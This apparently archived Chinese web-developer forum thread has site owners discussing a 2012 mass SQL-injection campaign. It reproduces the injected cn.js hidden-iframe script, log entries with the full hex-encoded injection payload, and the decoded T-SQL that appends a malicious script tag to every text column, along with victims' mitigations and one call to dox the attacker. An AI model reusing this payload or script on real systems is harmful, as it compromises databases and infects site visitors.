首页 诗词 字典 板报 句子 名言 友答 励志 学校 网站地图
当前位置: 首页 > 教程频道 > 网站开发 > asp.net >

中招的朋友们,进来一起[举报恶意网站] cn.daxia123.cn|cn.jxmmtv.com解决方案

2012-02-12 
中招的朋友们,进来一起[举报恶意网站] cn.daxia123.cn|cn.jxmmtv.com最近网站经常被这样挂马修改用户数据

中招的朋友们,进来一起[举报恶意网站] cn.daxia123.cn|cn.jxmmtv.com
最近网站经常被这样挂马

修改用户数据库挂马,google搜索有2000多网站中招

我的也中招了,我分析了一下。
以下是cn.js的代码
window.status="";

var cookieString = document.cookie;
var start = cookieString.indexOf("cnfuck=");
if (start != -1)
{
}
else
{
var expires = new Date();
expires.setTime(expires.getTime()+1*3600*1000);
document.cookie = "cnfuck=update;expires="+expires.toGMTString();
document.write("<iframe src=http://cn.daxia123.cn/cn.htm width=200 height=0></iframe>");
document.write("<iframe src=http://cn.daxia123.cn/s.htm width=200 height=0></iframe>");
}

而上述引用到的cn.htm的代码是:
<script src="http://s39.cnzz.com/stat.php?id=1184740&web_id=1184740"
language="JavaScript" charset="gb2312"></script>
可以看出是为了向中国站长网刷IP的。如果有中国站长网的人,请明确一下上述代码的作用,
根据id=1184740&web_id=1184740找出真凶。
而上述引用到的s.htm的代码是一些乱码,我发在附件,高手帮分析一下。

请解决问题的朋友来帮帮忙吧~

猜测会不会是通过sql注入式攻击,但我们的代码已经进行防水处理了,不知道是从哪儿攻击网站的



[解决办法]
hen taoyan de ma
[解决办法]
你看看你的数据库里面有没有<script>类型这样的东西,如果有那就是被注入了
[解决办法]
郁闷啊, 我网站也被中标了。怎么办。
[解决办法]
我的也中招了,昨天把数据库还原了,今天早上发现有中马了,还是<script src=http://cn.daxia123.cn/cn.js></script>,刚把昨天的数据库 中的<script src=http://cn.daxia123.cn/cn.js></script>这段代码都给清除掉了,幸好数据量不是很大,又还原数据库了,现在中马的原因还没查处了啊,郁闷哪。。。
[解决办法]
日。自己写的代码最基本的要防SQL注入啊
[解决办法]
这几天也不知咋搞的.我的站上面也有啊.清理也不管.钢清理完又有了.
[解决办法]
建议大家人肉搜索一下那家伙.
[解决办法]
地址是访问量统计,人家用来统计中招的的网站浏览量。

是服务器中毒而已,根本不是sql注入。
[解决办法]
哦.看来还挻复杂的吗.
[解决办法]
我也中了这个大侠123的木马,我使用了一个暂时解决的办法,对vachar或nvachar字段长度做了限制,找出该字段最长的字段长度N,然后将该字段的最大长度设为N,发现效果还可以,至少已经有2天没有被注入了,其他如ntext或text字段的就做了一个触发器的限制,不允许插入script。

如果按13楼所说是2进制注入的话,我觉得可以通过判断post值的长度来临时解决,毕竟正常情况下不会传一个这么长的值吧
[解决办法]
顶,关注了
[解决办法]
最近网站经常被这样挂马 

修改用户数据库挂马,google搜索有2000多

网站中招 

我的也中招了,我分析了一下。 
以下是cn.js的代码 
window.status=""; 

var cookieString = document.cookie; 
var start = cookieString.indexOf

("cnfuck="); 
if (start != -1) 


else 

var expires = new Date(); 
expires.setTime(expires.getTime()

+1*3600*1000); 
document.cookie = 

"cnfuck=update;expires="+expires.toGMT

String(); 
document.write(" <iframe 

src=http://cn.daxia123.cn/cn.htm 

width=200 height=0> </iframe>"); 
document.write(" <iframe 

src=http://cn.daxia123.cn/s.htm 

width=200 height=0> </iframe>"); 


而上述引用到的cn.htm的代码是: 


<script 

src="http://s39.cnzz.com/stat.php?

id=1184740&web_id=1184740" 
language="JavaScript" 

charset="gb2312"> </script> 
可以看出是为了向中国站长网刷IP的。如果

有中国站长网的人,请明确一下上述代码的

作用, 
根据id=1184740&web_id=1184740找出真凶

。 
而上述引用到的s.htm的代码是一些乱码,

我发在附件,高手帮分析一下。 

请解决问题的朋友来帮帮忙吧~ 

猜测会不会是通过sql注入式攻击,但我们的

代码已经进行防水处理了,不知道是从哪儿

攻击网站的 


网上有的朋友找到了下面内容: 

目前发现一个问题了,是注入式攻击,通过

对访问日志的查看,终于发现了访问有问题

,来自IP-121.42.214.238(河北省邯郸市

)的访问里面,有一段: 
GET /news/more.asp

classid=18;dEcLaRe%20@S%20VaRcHaR

(4000)%20SeT%20@s=cAsT

(0x4445434C415245204054205641524348415

228323535292C4043205641524348415228323

53529204445434C415245205461626C655F437

572736F7220435552534F5220464F522053454

C45435420612E6E616D652C622E6E616D65204

6524F4D207379736F626A6563747320612C737

973636F6C756D6E73206220574845524520612

E69643D622E696420414E4420612E787479706

53D27752720414E442028622E78747970653D3

939204F5220622E78747970653D3335204F522

0622E78747970653D323331204F5220622E787

47970653D31363729204F50454E205461626C6

55F437572736F72204645544348204E4558542

046524F4D205461626C655F437572736F72204

94E544F2040542C4043205748494C452840404

6455443485F5354415455533D3029204245474

94E20455845432827555044415445205B272B4

0542B275D20534554205B272B40432B275D3D5

25452494D28434F4E564552542856415243484

1522834303030292C5B272B40432B275D29292

B27273C736372697074207372633D687474703

A2F2F636E2E6A786D6D74762E636F6D2F636E2

E6A733E3C2F7363726970743E2727272920464

5544348204E4558542046524F4D205461626C6

55F437572736F7220494E544F2040542C40432

0454E4420434C4F5345205461626C655F43757

2736F72204445414C4C4F43415445205461626

C655F437572736F72%20aS%20VaRcHaR

(4000));eXeC(@s);-- 80 -

121.42.214.238 Mozilla/4.0+

(compatible;+MSIE+6.0;+Windows+NT+5.0) 

404 0 3 
里面明显地有注入的攻击代码。我猜想会不

会是这个引起的病毒,而这一访问也和我的

网站中病毒时间吻合,所以强烈建议大家检

查你的网站,是不是对程序进行过防水处理

了! 
快过元旦了,大家都做好安检工作吧~ 

希望大家帮忙顶,让更多人知道这个木马,

让更多人受益

我也做了防止SQL注入的代码,可还是被修改

数据库存中内容 
下面的是日志 

/gqxx/gx_info.asp id=48941';dEcLaRe%

20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT

(0x4445434C415245204054205641524348415

228323535292C4043205641524348415228323

53529204445434C415245205461626C655F437

572736F7220435552534F5220464F522053454

C45435420612E6E616D652C622E6E616D65204

6524F4D207379736F626A6563747320612C737

973636F6C756D6E73206220574845524520612

E69643D622E696420414E4420612E787479706

53D27752720414E442028622E78747970653D3

939204F5220622E78747970653D3335204F522

0622E78747970653D323331204F5220622E787

47970653D31363729204F50454E205461626C6

55F437572736F72204645544348204E4558542

046524F4D205461626C655F437572736F72204

94E544F2040542C4043205748494C452840404

6455443485F5354415455533D3029204245474

94E20455845432827555044415445205B272B4

0542B275D20534554205B272B40432B275D3D5

25452494D28434F4E564552542856415243484

1522834303030292C5B272B40432B275D29292

B27273C736372697074207372633D687474703

A2F2F636E2E6A786D6D74762E636F6D2F636E2

E6A733E3C2F7363726970743E2727272920464

5544348204E4558542046524F4D205461626C6

55F437572736F7220494E544F2040542C40432

0454E4420434C4F5345205461626C655F43757


2736F72204445414C4C4F43415445205461626

C655F437572736F72%20aS%20VaRcHaR

(4000));eXeC(@s);-- 80 - 122.9.2.39 

Mozilla/4.0+

(compatible;+MSIE+6.0;+Windows+NT+5.0) 

200 0 0 

我用的就是.net 

原因基本查到了,就是攻击者将攻击代码用

2进制,或10或10进制编译成了 

类似于这样的代码:

0x4445434C4152452040542056415243484152

28323535292C404 

放sql注入的代码不能检测出来,但是sql 

server 会把这样的代码在解释成原来的样

子 

这样就绕过了sql防注入代码。 

但是,这个代码仅对能解释它的sql server

这样的数据库有效 

针对access这样的不能解释它的数据库类型

攻击无效 

我也中了这个大侠123的木马,我使用了一

个暂时解决的办法,对vachar或nvachar字段

长度做了限制,找出该字段最长的字段长度

N,然后将该字段的最大长度设为N,发现效

果还可以,至少已经有2天没有被注入了,

其他如ntext或text字段的就做了一个触发

器的限制,不允许插入script。 

如果按13楼所说是2进制注入的话,我觉得

可以通过判断post值的长度来临时解决,毕

竟正常情况下不会传一个这么长的值吧
[解决办法]
各位朋友:
我也和你们一样中标了
我在卡卡论坛里看到一些信息,希望对各位有所帮助!
参考网址 :http://bbs.ikaka.com/showtopic-8580913-3.aspx

这些二进制编码是:
DECLARE @T VARCHAR(255),@C VARCHAR(255) 
DECLARE Table_Cursor CURSOR FOR 
SELECT a.name,b.name FROM sysobjects a,syscolumns b 
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) 
OPEN Table_Cursor 
FETCH NEXT FROM Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://cn.daxia123.cn/cn.js></script>''') 
FETCH NEXT FROM Table_Cursor INTO @T,@C END 
CLOSE Table_Cursor DEALLOCATE Table_Cursor

此种方法的破坏程度非常严重丫!!!

没有防止注入,总有一次会成功的
我数据库复原后,自己还傻傻的试了一次…又得重新复原一次
除了防止注入是否还有更好的办法呢?
[解决办法]
以上内容是引用别人的,我也刚刚看到的,希望对大家有时帮助
[解决办法]
NND,我也中招了
[解决办法]
Up
[解决办法]
我也中招了,是在数据库里的末尾加入了<script....>
autumnkhy 这位朋友,你说在text型加个触发器,限制<script...>输入,请问怎么做呀
[解决办法]
up
[解决办法]

探讨
各位朋友:
我也和你们一样中标了
我在卡卡论坛里看到一些信息,希望对各位有所帮助!
参考网址 :http://bbs.ikaka.com/showtopic-8580913-3.aspx

这些二进制编码是:
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN…

[解决办法]
顶了 

刚建一c#群 63242231 希望有志同道合的朋友和高手加入指导 

谢谢。。。呵呵呵

热点排行